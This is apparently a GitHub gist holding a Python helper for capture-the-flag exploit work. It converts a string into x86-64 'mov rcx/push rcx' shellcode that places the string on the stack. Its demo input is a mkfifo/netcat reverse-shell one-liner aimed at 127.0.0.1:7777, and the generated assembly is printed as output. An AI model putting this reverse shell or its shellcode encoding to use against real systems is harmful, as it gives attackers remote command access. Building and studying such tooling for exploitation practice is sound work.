@thinkycx
Last active April 19, 2021 07:13
return asm shellcode : push string into stack and esp points to it!
#!/usr/bin/python
# date: 2018-12-11
# author: thinkycx
# description: return asm shellcode text that pushes a string onto the stack so that esp (rsp in the 64-bit code emitted below) points to it
# usage:
# change payload and run it.
import math
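def pushstr(string='/home/orw/flag', length=8):
    '''
    Return assembly text that pushes `string` onto the stack piece by piece.

    The string is reversed and cut into pieces of at most `length` bytes;
    each piece is hex-encoded and emitted as `mov rcx, 0x<hex>` followed by
    `push rcx`. The short piece (the tail of the original string) is emitted
    first, so after the last push the stack pointer points at the first
    character of the string.

    This function only formats and prints text: nothing is assembled or
    executed here.

    Parameters:
        string: text or bytes to encode. Text is encoded as UTF-8 first.
        length: maximum bytes per pushed piece. The emitted instructions
            always use the 64-bit rcx register and the value is not checked
            against that width, so 8 is the only size that matches the
            instruction pair.

    Returns:
        The generated assembly as a single newline-terminated string
        (empty when `string` is empty).
    '''
    # print(...) with one argument and %-formatting behave the same on
    # Python 2 and Python 3; the original print statement and
    # str.encode('hex') exist on Python 2 only.
    print('pushasm: %s' % string)

    raw = string if isinstance(string, bytes) else string.encode('utf-8')
    # bytearray yields integers on both Python 2 and Python 3.
    flipped = bytearray(raw[::-1])
    total = len(flipped)
    chunk_count = int(math.ceil(float(total) / length))

    lines = []
    offset = 0
    for index in range(1, chunk_count + 1):
        # Only the first piece can be shorter than `length`; it holds the
        # remainder so every later piece is full-sized.
        size = min(length, total - (chunk_count - index) * length)
        digits = ''.join('%02x' % byte for byte in flipped[offset:offset + size])
        lines.append('mov rcx, 0x%s\npush rcx\n' % digits)
        offset += size

    # Build the result under a separate name so the function is not shadowed.
    asm = ''.join(lines)
    print(asm)
    return asm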
# Sample input for the demo run: a shell one-liner whose network endpoint is
# the loopback address 127.0.0.1, port 7777. pushstr() only converts the text
# to assembly source and prints it; this script never runs the command.
payload = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 7777 > /tmp/f'
pushstr(string=payload)
'''
Output:
pushasm: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 7777 > /tmp/f
mov rcx, 0x662f706d74
push rcx
mov rcx, 0x2f203e2037373737
push rcx
mov rcx, 0x20312e302e302e37
push rcx
mov rcx, 0x323120636e7c3126
push rcx
mov rcx, 0x3e3220692d206873
push rcx
mov rcx, 0x2f6e69622f7c662f
push rcx
mov rcx, 0x706d742f20746163
push rcx
mov rcx, 0x3b662f706d742f20
push rcx
mov rcx, 0x6f6669666b6d3b66
push rcx
mov rcx, 0x2f706d742f206d72
push rcx
'''